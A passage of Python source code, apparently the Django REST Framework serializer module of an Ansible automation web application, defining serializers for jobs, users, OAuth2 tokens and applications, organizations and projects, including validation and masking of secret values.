= 0\n\n # Use custom boolean field that allows null and empty string as False values.\n if isinstance(model_field, models.BooleanField) and not field_kwargs.get('read_only', False):\n field_class = BooleanNullField\n\n # Use custom char or choice field that coerces null to an empty string.\n if isinstance(model_field, (models.CharField, models.TextField)) and not field_kwargs.get('read_only', False):\n if 'choices' in field_kwargs:\n field_class = ChoiceNullField\n else:\n field_class = CharNullField\n\n # Update the message used for the unique validator to use capitalized\n # verbose name; keeps unique message the same as with DRF 2.x.\n opts = self.Meta.model._meta.concrete_model._meta\n for validator in field_kwargs.get('validators', []):\n if isinstance(validator, validators.UniqueValidator):\n unique_error_message = model_field.error_messages.get('unique', None)\n if unique_error_message:\n unique_error_message = unique_error_message % {\n 'model_name': capfirst(opts.verbose_name),\n 'field_label': capfirst(model_field.verbose_name),\n }\n validator.message = unique_error_message\n\n return field_class, field_kwargs\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(BaseSerializer, self).build_relational_field(field_name, relation_info)\n # Don't include choices for foreign key fields.\n field_kwargs.pop('choices', None)\n return field_class, field_kwargs\n\n def get_unique_together_validators(self):\n # Allow the model's full_clean method to handle the unique together validation.\n return []\n\n def run_validation(self, data=fields.empty):\n try:\n return super(BaseSerializer, self).run_validation(data)\n except ValidationError as exc:\n # Avoid bug? in DRF if exc.detail happens to be a list instead of a dict.\n raise ValidationError(detail=serializers.as_serializer_error(exc))\n\n def get_validation_exclusions(self, obj=None):\n # Borrowed from DRF 2.x - return model fields that should be excluded\n # from model validation.\n cls = self.Meta.model\n opts = cls._meta.concrete_model._meta\n exclusions = [field.name for field in opts.fields]\n for field_name, field in self.fields.items():\n field_name = field.source or field_name\n if field_name not in exclusions:\n continue\n if field.read_only:\n continue\n if isinstance(field, serializers.Serializer):\n continue\n exclusions.remove(field_name)\n # The clean_ methods cannot be ran on many-to-many models\n exclusions.extend([field.name for field in opts.many_to_many])\n return exclusions\n\n def validate(self, attrs):\n attrs = super(BaseSerializer, self).validate(attrs)\n try:\n # Create/update a model instance and run it's full_clean() method to\n # do any validation implemented on the model class.\n exclusions = self.get_validation_exclusions(self.instance)\n obj = self.instance or self.Meta.model()\n for k,v in attrs.items():\n if k not in exclusions:\n setattr(obj, k, v)\n obj.full_clean(exclude=exclusions)\n # full_clean may modify values on the instance; copy those changes\n # back to attrs so they are saved.\n for k in attrs.keys():\n if k not in exclusions:\n attrs[k] = getattr(obj, k)\n except DjangoValidationError as exc:\n # DjangoValidationError may contain a list or dict; normalize into a\n # dict where the keys are the field name and the values are a list\n # of error messages, then raise as a DRF ValidationError. DRF would\n # normally convert any DjangoValidationError to a non-field specific\n # error message; here we preserve field-specific errors raised from\n # the model's full_clean method.\n d = exc.update_error_dict({})\n for k,v in d.items():\n v = v if isinstance(v, list) else [v]\n v2 = []\n for e in v:\n if isinstance(e, DjangoValidationError):\n v2.extend(list(e))\n elif isinstance(e, list):\n v2.extend(e)\n else:\n v2.append(e)\n d[k] = list(map(force_text, v2))\n raise ValidationError(d)\n return attrs\n\n def reverse(self, *args, **kwargs):\n kwargs['request'] = self.context.get('request')\n return reverse(*args, **kwargs)\n\n @property\n def is_detail_view(self):\n if 'view' in self.context:\n if 'pk' in self.context['view'].kwargs:\n return True\n return False\n\n\nclass EmptySerializer(serializers.Serializer):\n pass\n\n\nclass UnifiedJobTemplateSerializer(BaseSerializer):\n # As a base serializer, the capabilities prefetch is not used directly\n _capabilities_prefetch = [\n 'admin', 'execute',\n {'copy': ['jobtemplate.project.use', 'jobtemplate.inventory.use',\n 'workflowjobtemplate.organization.workflow_admin']}\n ]\n\n class Meta:\n model = UnifiedJobTemplate\n fields = ('*', 'last_job_run', 'last_job_failed',\n 'next_job_run', 'status')\n\n def get_related(self, obj):\n res = super(UnifiedJobTemplateSerializer, self).get_related(obj)\n if obj.current_job:\n res['current_job'] = obj.current_job.get_absolute_url(request=self.context.get('request'))\n if obj.last_job:\n res['last_job'] = obj.last_job.get_absolute_url(request=self.context.get('request'))\n if obj.next_schedule:\n res['next_schedule'] = obj.next_schedule.get_absolute_url(request=self.context.get('request'))\n return res\n\n def get_types(self):\n if type(self) is UnifiedJobTemplateSerializer:\n return ['project', 'inventory_source', 'job_template', 'system_job_template', 'workflow_job_template',]\n else:\n return super(UnifiedJobTemplateSerializer, self).get_types()\n\n def get_sub_serializer(self, obj):\n serializer_class = None\n if type(self) is UnifiedJobTemplateSerializer:\n if isinstance(obj, Project):\n serializer_class = ProjectSerializer\n elif isinstance(obj, InventorySource):\n serializer_class = InventorySourceSerializer\n elif isinstance(obj, JobTemplate):\n serializer_class = JobTemplateSerializer\n elif isinstance(obj, SystemJobTemplate):\n serializer_class = SystemJobTemplateSerializer\n elif isinstance(obj, WorkflowJobTemplate):\n serializer_class = WorkflowJobTemplateSerializer\n return serializer_class\n\n def to_representation(self, obj):\n serializer_class = self.get_sub_serializer(obj)\n if serializer_class:\n serializer = serializer_class(instance=obj, context=self.context)\n # preserve links for list view\n if self.parent:\n serializer.parent = self.parent\n serializer.polymorphic_base = self\n # capabilities prefetch is only valid for these models\n if isinstance(obj, (JobTemplate, WorkflowJobTemplate)):\n serializer.capabilities_prefetch = self._capabilities_prefetch\n else:\n serializer.capabilities_prefetch = None\n return serializer.to_representation(obj)\n else:\n return super(UnifiedJobTemplateSerializer, self).to_representation(obj)\n\n\nclass UnifiedJobSerializer(BaseSerializer):\n show_capabilities = ['start', 'delete']\n event_processing_finished = serializers.BooleanField(\n help_text=_('Indicates whether all of the events generated by this '\n 'unified job have been saved to the database.'),\n read_only=True\n )\n\n class Meta:\n model = UnifiedJob\n fields = ('*', 'unified_job_template', 'launch_type', 'status',\n 'failed', 'started', 'finished', 'elapsed', 'job_args',\n 'job_cwd', 'job_env', 'job_explanation',\n 'execution_node', 'controller_node',\n 'result_traceback', 'event_processing_finished')\n extra_kwargs = {\n 'unified_job_template': {\n 'source': 'unified_job_template_id',\n 'label': 'unified job template',\n },\n 'job_env': {\n 'read_only': True,\n 'label': 'job_env',\n }\n }\n\n def get_types(self):\n if type(self) is UnifiedJobSerializer:\n return ['project_update', 'inventory_update', 'job', 'ad_hoc_command', 'system_job', 'workflow_job',]\n else:\n return super(UnifiedJobSerializer, self).get_types()\n\n def get_related(self, obj):\n res = super(UnifiedJobSerializer, self).get_related(obj)\n if obj.unified_job_template:\n res['unified_job_template'] = obj.unified_job_template.get_absolute_url(request=self.context.get('request'))\n if obj.schedule:\n res['schedule'] = obj.schedule.get_absolute_url(request=self.context.get('request'))\n if isinstance(obj, ProjectUpdate):\n res['stdout'] = self.reverse('api:project_update_stdout', kwargs={'pk': obj.pk})\n elif isinstance(obj, InventoryUpdate):\n res['stdout'] = self.reverse('api:inventory_update_stdout', kwargs={'pk': obj.pk})\n elif isinstance(obj, Job):\n res['stdout'] = self.reverse('api:job_stdout', kwargs={'pk': obj.pk})\n elif isinstance(obj, AdHocCommand):\n res['stdout'] = self.reverse('api:ad_hoc_command_stdout', kwargs={'pk': obj.pk})\n if obj.workflow_job_id:\n res['source_workflow_job'] = self.reverse('api:workflow_job_detail', kwargs={'pk': obj.workflow_job_id})\n return res\n\n def get_summary_fields(self, obj):\n summary_fields = super(UnifiedJobSerializer, self).get_summary_fields(obj)\n if obj.spawned_by_workflow:\n summary_fields['source_workflow_job'] = {}\n try:\n summary_obj = obj.unified_job_node.workflow_job\n except UnifiedJob.unified_job_node.RelatedObjectDoesNotExist:\n return summary_fields\n\n for field in SUMMARIZABLE_FK_FIELDS['job']:\n val = getattr(summary_obj, field, None)\n if val is not None:\n summary_fields['source_workflow_job'][field] = val\n\n return summary_fields\n\n def get_sub_serializer(self, obj):\n serializer_class = None\n if type(self) is UnifiedJobSerializer:\n if isinstance(obj, ProjectUpdate):\n serializer_class = ProjectUpdateSerializer\n elif isinstance(obj, InventoryUpdate):\n serializer_class = InventoryUpdateSerializer\n elif isinstance(obj, Job):\n serializer_class = JobSerializer\n elif isinstance(obj, AdHocCommand):\n serializer_class = AdHocCommandSerializer\n elif isinstance(obj, SystemJob):\n serializer_class = SystemJobSerializer\n elif isinstance(obj, WorkflowJob):\n serializer_class = WorkflowJobSerializer\n return serializer_class\n\n def to_representation(self, obj):\n serializer_class = self.get_sub_serializer(obj)\n if serializer_class:\n serializer = serializer_class(instance=obj, context=self.context)\n # preserve links for list view\n if self.parent:\n serializer.parent = self.parent\n serializer.polymorphic_base = self\n # TODO: restrict models for capabilities prefetch, when it is added\n ret = serializer.to_representation(obj)\n else:\n ret = super(UnifiedJobSerializer, self).to_representation(obj)\n\n if 'elapsed' in ret:\n if obj and obj.pk and obj.started and not obj.finished:\n td = now() - obj.started\n ret['elapsed'] = (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6) / (10 ** 6 * 1.0)\n ret['elapsed'] = float(ret['elapsed'])\n\n return ret\n\n\nclass UnifiedJobListSerializer(UnifiedJobSerializer):\n\n class Meta:\n fields = ('*', '-job_args', '-job_cwd', '-job_env', '-result_traceback', '-event_processing_finished')\n\n def get_field_names(self, declared_fields, info):\n field_names = super(UnifiedJobListSerializer, self).get_field_names(declared_fields, info)\n # Meta multiple inheritance and -field_name options don't seem to be\n # taking effect above, so remove the undesired fields here.\n return tuple(x for x in field_names if x not in ('job_args', 'job_cwd', 'job_env', 'result_traceback', 'event_processing_finished'))\n\n def get_types(self):\n if type(self) is UnifiedJobListSerializer:\n return ['project_update', 'inventory_update', 'job', 'ad_hoc_command', 'system_job', 'workflow_job']\n else:\n return super(UnifiedJobListSerializer, self).get_types()\n\n def get_sub_serializer(self, obj):\n serializer_class = None\n if type(self) is UnifiedJobListSerializer:\n if isinstance(obj, ProjectUpdate):\n serializer_class = ProjectUpdateListSerializer\n elif isinstance(obj, InventoryUpdate):\n serializer_class = InventoryUpdateListSerializer\n elif isinstance(obj, Job):\n serializer_class = JobListSerializer\n elif isinstance(obj, AdHocCommand):\n serializer_class = AdHocCommandListSerializer\n elif isinstance(obj, SystemJob):\n serializer_class = SystemJobListSerializer\n elif isinstance(obj, WorkflowJob):\n serializer_class = WorkflowJobListSerializer\n return serializer_class\n\n def to_representation(self, obj):\n serializer_class = self.get_sub_serializer(obj)\n if serializer_class:\n serializer = serializer_class(instance=obj, context=self.context)\n ret = serializer.to_representation(obj)\n else:\n ret = super(UnifiedJobListSerializer, self).to_representation(obj)\n if 'elapsed' in ret:\n ret['elapsed'] = float(ret['elapsed'])\n return ret\n\n\nclass UnifiedJobStdoutSerializer(UnifiedJobSerializer):\n\n result_stdout = serializers.SerializerMethodField()\n\n class Meta:\n fields = ('result_stdout',)\n\n def get_types(self):\n if type(self) is UnifiedJobStdoutSerializer:\n return ['project_update', 'inventory_update', 'job', 'ad_hoc_command', 'system_job']\n else:\n return super(UnifiedJobStdoutSerializer, self).get_types()\n\n\nclass UserSerializer(BaseSerializer):\n\n password = serializers.CharField(required=False, default='', write_only=True,\n help_text=_('Write-only field used to change the password.'))\n ldap_dn = serializers.CharField(source='profile.ldap_dn', read_only=True)\n external_account = serializers.SerializerMethodField(help_text=_('Set if the account is managed by an external service'))\n is_system_auditor = serializers.BooleanField(default=False)\n show_capabilities = ['edit', 'delete']\n\n class Meta:\n model = User\n fields = ('*', '-name', '-description', '-modified',\n 'username', 'first_name', 'last_name',\n 'email', 'is_superuser', 'is_system_auditor', 'password', 'ldap_dn', 'last_login', 'external_account')\n\n def to_representation(self, obj):\n ret = super(UserSerializer, self).to_representation(obj)\n ret.pop('password', None)\n if obj and type(self) is UserSerializer:\n ret['auth'] = obj.social_auth.values('provider', 'uid')\n return ret\n\n def get_validation_exclusions(self, obj=None):\n ret = super(UserSerializer, self).get_validation_exclusions(obj)\n ret.extend(['password', 'is_system_auditor'])\n return ret\n\n def validate_password(self, value):\n if not self.instance and value in (None, ''):\n raise serializers.ValidationError(_('Password required for new User.'))\n return value\n\n def _update_password(self, obj, new_password):\n # For now we're not raising an error, just not saving password for\n # users managed by LDAP who already have an unusable password set.\n if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):\n try:\n if obj.pk and obj.profile.ldap_dn and not obj.has_usable_password():\n new_password = None\n except AttributeError:\n pass\n if (getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None) or\n getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None) or\n getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None) or\n getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None) or\n getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)) and obj.social_auth.all():\n new_password = None\n if (getattr(settings, 'RADIUS_SERVER', None) or\n getattr(settings, 'TACACSPLUS_HOST', None)) and obj.enterprise_auth.all():\n new_password = None\n if new_password:\n obj.set_password(new_password)\n obj.save(update_fields=['password'])\n\n # Cycle the session key, but if the requesting user is the same\n # as the modified user then inject a session key derived from\n # the updated user to prevent logout. This is the logic used by\n # the Django admin's own user_change_password view.\n update_session_auth_hash(self.context['request'], obj)\n elif not obj.password:\n obj.set_unusable_password()\n obj.save(update_fields=['password'])\n\n def get_external_account(self, obj):\n return get_external_account(obj)\n\n def create(self, validated_data):\n new_password = validated_data.pop('password', None)\n is_system_auditor = validated_data.pop('is_system_auditor', None)\n obj = super(UserSerializer, self).create(validated_data)\n self._update_password(obj, new_password)\n if is_system_auditor is not None:\n obj.is_system_auditor = is_system_auditor\n return obj\n\n def update(self, obj, validated_data):\n new_password = validated_data.pop('password', None)\n is_system_auditor = validated_data.pop('is_system_auditor', None)\n obj = super(UserSerializer, self).update(obj, validated_data)\n self._update_password(obj, new_password)\n if is_system_auditor is not None:\n obj.is_system_auditor = is_system_auditor\n return obj\n\n def get_related(self, obj):\n res = super(UserSerializer, self).get_related(obj)\n res.update(dict(\n teams = self.reverse('api:user_teams_list', kwargs={'pk': obj.pk}),\n organizations = self.reverse('api:user_organizations_list', kwargs={'pk': obj.pk}),\n admin_of_organizations = self.reverse('api:user_admin_of_organizations_list', kwargs={'pk': obj.pk}),\n projects = self.reverse('api:user_projects_list', kwargs={'pk': obj.pk}),\n credentials = self.reverse('api:user_credentials_list', kwargs={'pk': obj.pk}),\n roles = self.reverse('api:user_roles_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:user_activity_stream_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:user_access_list', kwargs={'pk': obj.pk}),\n tokens = self.reverse('api:o_auth2_token_list', kwargs={'pk': obj.pk}),\n authorized_tokens = self.reverse('api:user_authorized_token_list', kwargs={'pk': obj.pk}),\n personal_tokens = self.reverse('api:user_personal_token_list', kwargs={'pk': obj.pk}),\n ))\n return res\n\n def _validate_ldap_managed_field(self, value, field_name):\n if not getattr(settings, 'AUTH_LDAP_SERVER_URI', None):\n return value\n try:\n is_ldap_user = bool(self.instance and self.instance.profile.ldap_dn)\n except AttributeError:\n is_ldap_user = False\n if is_ldap_user:\n ldap_managed_fields = ['username']\n ldap_managed_fields.extend(getattr(settings, 'AUTH_LDAP_USER_ATTR_MAP', {}).keys())\n ldap_managed_fields.extend(getattr(settings, 'AUTH_LDAP_USER_FLAGS_BY_GROUP', {}).keys())\n if field_name in ldap_managed_fields:\n if value != getattr(self.instance, field_name):\n raise serializers.ValidationError(_('Unable to change %s on user managed by LDAP.') % field_name)\n return value\n\n def validate_username(self, value):\n return self._validate_ldap_managed_field(value, 'username')\n\n def validate_first_name(self, value):\n return self._validate_ldap_managed_field(value, 'first_name')\n\n def validate_last_name(self, value):\n return self._validate_ldap_managed_field(value, 'last_name')\n\n def validate_email(self, value):\n return self._validate_ldap_managed_field(value, 'email')\n\n def validate_is_superuser(self, value):\n return self._validate_ldap_managed_field(value, 'is_superuser')\n\n\nclass UserActivityStreamSerializer(UserSerializer):\n \"\"\"Changes to system auditor status are shown as separate entries,\n so by excluding it from fields here we avoid duplication, which\n would carry some unintended consequences.\n \"\"\"\n class Meta:\n model = User\n fields = ('*', '-is_system_auditor')\n\n\nclass BaseOAuth2TokenSerializer(BaseSerializer):\n\n refresh_token = serializers.SerializerMethodField()\n token = serializers.SerializerMethodField()\n ALLOWED_SCOPES = ['read', 'write']\n\n class Meta:\n model = OAuth2AccessToken\n fields = (\n '*', '-name', 'description', 'user', 'token', 'refresh_token',\n 'application', 'expires', 'scope',\n )\n read_only_fields = ('user', 'token', 'expires', 'refresh_token')\n extra_kwargs = {\n 'scope': {'allow_null': False, 'required': False},\n 'user': {'allow_null': False, 'required': True}\n }\n\n def get_token(self, obj):\n request = self.context.get('request', None)\n try:\n if request.method == 'POST':\n return obj.token\n else:\n return CENSOR_VALUE\n except ObjectDoesNotExist:\n return ''\n\n def get_refresh_token(self, obj):\n request = self.context.get('request', None)\n try:\n if not obj.refresh_token:\n return None\n elif request.method == 'POST':\n return getattr(obj.refresh_token, 'token', '')\n else:\n return CENSOR_VALUE\n except ObjectDoesNotExist:\n return None\n\n def get_related(self, obj):\n ret = super(BaseOAuth2TokenSerializer, self).get_related(obj)\n if obj.user:\n ret['user'] = self.reverse('api:user_detail', kwargs={'pk': obj.user.pk})\n if obj.application:\n ret['application'] = self.reverse(\n 'api:o_auth2_application_detail', kwargs={'pk': obj.application.pk}\n )\n ret['activity_stream'] = self.reverse(\n 'api:o_auth2_token_activity_stream_list', kwargs={'pk': obj.pk}\n )\n return ret\n\n def _is_valid_scope(self, value):\n if not value or (not isinstance(value, str)):\n return False\n words = value.split()\n for word in words:\n if words.count(word) > 1:\n return False # do not allow duplicates\n if word not in self.ALLOWED_SCOPES:\n return False\n return True\n\n def validate_scope(self, value):\n if not self._is_valid_scope(value):\n raise serializers.ValidationError(_(\n 'Must be a simple space-separated string with allowed scopes {}.'\n ).format(self.ALLOWED_SCOPES))\n return value\n\n def create(self, validated_data):\n validated_data['user'] = self.context['request'].user\n try:\n return super(BaseOAuth2TokenSerializer, self).create(validated_data)\n except oauth2.AccessDeniedError as e:\n raise PermissionDenied(str(e))\n\n\nclass UserAuthorizedTokenSerializer(BaseOAuth2TokenSerializer):\n\n class Meta:\n extra_kwargs = {\n 'scope': {'allow_null': False, 'required': False},\n 'user': {'allow_null': False, 'required': True},\n 'application': {'allow_null': False, 'required': True}\n }\n\n def create(self, validated_data):\n current_user = self.context['request'].user\n validated_data['token'] = generate_token()\n validated_data['expires'] = now() + timedelta(\n seconds=settings.OAUTH2_PROVIDER['ACCESS_TOKEN_EXPIRE_SECONDS']\n )\n obj = super(UserAuthorizedTokenSerializer, self).create(validated_data)\n obj.save()\n if obj.application:\n RefreshToken.objects.create(\n user=current_user,\n token=generate_token(),\n application=obj.application,\n access_token=obj\n )\n return obj\n\n\nclass OAuth2TokenSerializer(BaseOAuth2TokenSerializer):\n\n def create(self, validated_data):\n current_user = self.context['request'].user\n validated_data['token'] = generate_token()\n validated_data['expires'] = now() + timedelta(\n seconds=settings.OAUTH2_PROVIDER['ACCESS_TOKEN_EXPIRE_SECONDS']\n )\n obj = super(OAuth2TokenSerializer, self).create(validated_data)\n if obj.application and obj.application.user:\n obj.user = obj.application.user\n obj.save()\n if obj.application:\n RefreshToken.objects.create(\n user=current_user,\n token=generate_token(),\n application=obj.application,\n access_token=obj\n )\n return obj\n\n\nclass OAuth2TokenDetailSerializer(OAuth2TokenSerializer):\n\n class Meta:\n read_only_fields = ('*', 'user', 'application')\n\n\nclass UserPersonalTokenSerializer(BaseOAuth2TokenSerializer):\n\n class Meta:\n read_only_fields = ('user', 'token', 'expires', 'application')\n\n def create(self, validated_data):\n validated_data['token'] = generate_token()\n validated_data['expires'] = now() + timedelta(\n seconds=settings.OAUTH2_PROVIDER['ACCESS_TOKEN_EXPIRE_SECONDS']\n )\n validated_data['application'] = None\n obj = super(UserPersonalTokenSerializer, self).create(validated_data)\n obj.save()\n return obj\n\n\nclass OAuth2ApplicationSerializer(BaseSerializer):\n\n show_capabilities = ['edit', 'delete']\n\n class Meta:\n model = OAuth2Application\n fields = (\n '*', 'description', '-user', 'client_id', 'client_secret', 'client_type',\n 'redirect_uris', 'authorization_grant_type', 'skip_authorization', 'organization'\n )\n read_only_fields = ('client_id', 'client_secret')\n read_only_on_update_fields = ('user', 'authorization_grant_type')\n extra_kwargs = {\n 'user': {'allow_null': True, 'required': False},\n 'organization': {'allow_null': False},\n 'authorization_grant_type': {'allow_null': False, 'label': _('Authorization Grant Type')},\n 'client_secret': {\n 'label': _('Client Secret')\n },\n 'client_type': {\n 'label': _('Client Type')\n },\n 'redirect_uris': {\n 'label': _('Redirect URIs')\n },\n 'skip_authorization': {\n 'label': _('Skip Authorization')\n },\n }\n\n def to_representation(self, obj):\n ret = super(OAuth2ApplicationSerializer, self).to_representation(obj)\n request = self.context.get('request', None)\n if request.method != 'POST' and obj.client_type == 'confidential':\n ret['client_secret'] = CENSOR_VALUE\n if obj.client_type == 'public':\n ret.pop('client_secret', None)\n return ret\n\n def get_related(self, obj):\n res = super(OAuth2ApplicationSerializer, self).get_related(obj)\n res.update(dict(\n tokens = self.reverse('api:o_auth2_application_token_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse(\n 'api:o_auth2_application_activity_stream_list', kwargs={'pk': obj.pk}\n )\n ))\n return res\n\n def get_modified(self, obj):\n if obj is None:\n return None\n return obj.updated\n\n def _summary_field_tokens(self, obj):\n token_list = [{'id': x.pk, 'token': CENSOR_VALUE, 'scope': x.scope} for x in obj.oauth2accesstoken_set.all()[:10]]\n if has_model_field_prefetched(obj, 'oauth2accesstoken_set'):\n token_count = len(obj.oauth2accesstoken_set.all())\n else:\n if len(token_list) < 10:\n token_count = len(token_list)\n else:\n token_count = obj.oauth2accesstoken_set.count()\n return {'count': token_count, 'results': token_list}\n\n def get_summary_fields(self, obj):\n ret = super(OAuth2ApplicationSerializer, self).get_summary_fields(obj)\n ret['tokens'] = self._summary_field_tokens(obj)\n return ret\n\n\nclass OrganizationSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete']\n\n class Meta:\n model = Organization\n fields = ('*', 'max_hosts', 'custom_virtualenv',)\n\n def get_related(self, obj):\n res = super(OrganizationSerializer, self).get_related(obj)\n res.update(dict(\n projects = self.reverse('api:organization_projects_list', kwargs={'pk': obj.pk}),\n inventories = self.reverse('api:organization_inventories_list', kwargs={'pk': obj.pk}),\n workflow_job_templates = self.reverse('api:organization_workflow_job_templates_list', kwargs={'pk': obj.pk}),\n users = self.reverse('api:organization_users_list', kwargs={'pk': obj.pk}),\n admins = self.reverse('api:organization_admins_list', kwargs={'pk': obj.pk}),\n teams = self.reverse('api:organization_teams_list', kwargs={'pk': obj.pk}),\n credentials = self.reverse('api:organization_credential_list', kwargs={'pk': obj.pk}),\n applications = self.reverse('api:organization_applications_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:organization_activity_stream_list', kwargs={'pk': obj.pk}),\n notification_templates = self.reverse('api:organization_notification_templates_list', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:organization_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:organization_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:organization_notification_templates_error_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:organization_object_roles_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:organization_access_list', kwargs={'pk': obj.pk}),\n instance_groups = self.reverse('api:organization_instance_groups_list', kwargs={'pk': obj.pk}),\n ))\n return res\n\n def get_summary_fields(self, obj):\n summary_dict = super(OrganizationSerializer, self).get_summary_fields(obj)\n counts_dict = self.context.get('related_field_counts', None)\n if counts_dict is not None and summary_dict is not None:\n if obj.id not in counts_dict:\n summary_dict['related_field_counts'] = {\n 'inventories': 0, 'teams': 0, 'users': 0,\n 'job_templates': 0, 'admins': 0, 'projects': 0}\n else:\n summary_dict['related_field_counts'] = counts_dict[obj.id]\n return summary_dict\n\n def validate(self, attrs):\n obj = self.instance\n view = self.context['view']\n\n obj_limit = getattr(obj, 'max_hosts', None)\n api_limit = attrs.get('max_hosts')\n\n if not view.request.user.is_superuser:\n if api_limit is not None and api_limit != obj_limit:\n # Only allow superusers to edit the max_hosts field\n raise serializers.ValidationError(_('Cannot change max_hosts.'))\n\n return super(OrganizationSerializer, self).validate(attrs)\n\n\nclass ProjectOptionsSerializer(BaseSerializer):\n\n class Meta:\n fields = ('*', 'local_path', 'scm_type', 'scm_url', 'scm_branch',\n 'scm_clean', 'scm_delete_on_update', 'credential', 'timeout',)\n\n def get_related(self, obj):\n res = super(ProjectOptionsSerializer, self).get_related(obj)\n if obj.credential:\n res['credential'] = self.reverse('api:credential_detail',\n kwargs={'pk': obj.credential.pk})\n return res\n\n def validate(self, attrs):\n errors = {}\n\n # Don't allow assigning a local_path used by another project.\n # Don't allow assigning a local_path when scm_type is set.\n valid_local_paths = Project.get_local_path_choices()\n if self.instance:\n scm_type = attrs.get('scm_type', self.instance.scm_type) or u''\n else:\n scm_type = attrs.get('scm_type', u'') or u''\n if self.instance and not scm_type:\n valid_local_paths.append(self.instance.local_path)\n if scm_type:\n attrs.pop('local_path', None)\n if 'local_path' in attrs and attrs['local_path'] not in valid_local_paths:\n errors['local_path'] = _('This path is already being used by another manual project.')\n\n if errors:\n raise serializers.ValidationError(errors)\n\n return super(ProjectOptionsSerializer, self).validate(attrs)\n\n def to_representation(self, obj):\n ret = super(ProjectOptionsSerializer, self).to_representation(obj)\n if obj is not None and 'credential' in ret and not obj.credential:\n ret['credential'] = None\n return ret\n\n\nclass ProjectSerializer(UnifiedJobTemplateSerializer, ProjectOptionsSerializer):\n\n status = serializers.ChoiceField(choices=Project.PROJECT_STATUS_CHOICES, read_only=True)\n last_update_failed = serializers.BooleanField(read_only=True)\n last_updated = serializers.DateTimeField(read_only=True)\n show_capabilities = ['start', 'schedule', 'edit', 'delete', 'copy']\n capabilities_prefetch = [\n 'admin', 'update',\n {'copy': 'organization.project_admin'}\n ]\n\n class Meta:\n model = Project\n fields = ('*', 'organization', 'scm_update_on_launch',\n 'scm_update_cache_timeout', 'scm_revision', 'custom_virtualenv',) + \\\n ('last_update_failed', 'last_updated') # Backwards compatibility\n\n def get_related(self, obj):\n res = super(ProjectSerializer, self).get_related(obj)\n res.update(dict(\n teams = self.reverse('api:project_teams_list', kwargs={'pk': obj.pk}),\n playbooks = self.reverse('api:project_playbooks', kwargs={'pk': obj.pk}),\n inventory_files = self.reverse('api:project_inventories', kwargs={'pk': obj.pk}),\n update = self.reverse('api:project_update_view', kwargs={'pk': obj.pk}),\n project_updates = self.reverse('api:project_updates_list', kwargs={'pk': obj.pk}),\n scm_inventory_sources = self.reverse('api:project_scm_inventory_sources', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:project_schedules_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:project_activity_stream_list', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:project_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:project_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:project_notification_templates_error_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:project_access_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:project_object_roles_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:project_copy', kwargs={'pk': obj.pk})\n\n ))\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail',\n kwargs={'pk': obj.organization.pk})\n # Backwards compatibility.\n if obj.current_update:\n res['current_update'] = self.reverse('api:project_update_detail',\n kwargs={'pk': obj.current_update.pk})\n if obj.last_update:\n res['last_update'] = self.reverse('api:project_update_detail',\n kwargs={'pk': obj.last_update.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(ProjectSerializer, self).to_representation(obj)\n if 'scm_revision' in ret and obj.scm_type == '':\n ret['scm_revision'] = ''\n return ret\n\n def validate(self, attrs):\n def get_field_from_model_or_attrs(fd):\n return attrs.get(fd, self.instance and getattr(self.instance, fd) or None)\n\n organization = None\n if 'organization' in attrs:\n organization = attrs['organization']\n elif self.instance:\n organization = self.instance.organization\n\n view = self.context.get('view', None)\n if not organization and not view.request.user.is_superuser:\n # Only allow super users to create orgless projects\n raise serializers.ValidationError(_('Organization is missing'))\n elif get_field_from_model_or_attrs('scm_type') == '':\n for fd in ('scm_update_on_launch', 'scm_delete_on_update', 'scm_clean'):\n if get_field_from_model_or_attrs(fd):\n raise serializers.ValidationError({fd: _('Update options must be set to false for manual projects.')})\n return super(ProjectSerializer, self).validate(attrs)\n\n\nclass ProjectPlaybooksSerializer(ProjectSerializer):\n\n playbooks = serializers.SerializerMethodField(help_text=_('Array of playbooks available within this project.'))\n\n class Meta:\n model = Project\n fields = ('playbooks',)\n\n def get_playbooks(self, obj):\n return obj.playbook_files if obj.scm_type else obj.playbooks\n\n @property\n def data(self):\n ret = super(ProjectPlaybooksSerializer, self).data\n ret = ret.get('playbooks', [])\n return ReturnList(ret, serializer=self)\n\n\nclass ProjectInventoriesSerializer(ProjectSerializer):\n\n inventory_files = serializers.ReadOnlyField(help_text=_(\n 'Array of inventory files and directories available within this project, '\n 'not comprehensive.'))\n\n class Meta:\n model = Project\n fields = ('inventory_files',)\n\n @property\n def data(self):\n ret = super(ProjectInventoriesSerializer, self).data\n ret = ret.get('inventory_files', [])\n return ReturnList(ret, serializer=self)\n\n\nclass ProjectUpdateViewSerializer(ProjectSerializer):\n\n can_update = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_update',)\n\n\nclass ProjectUpdateSerializer(UnifiedJobSerializer, ProjectOptionsSerializer):\n\n class Meta:\n model = ProjectUpdate\n fields = ('*', 'project', 'job_type', '-controller_node')\n\n def get_related(self, 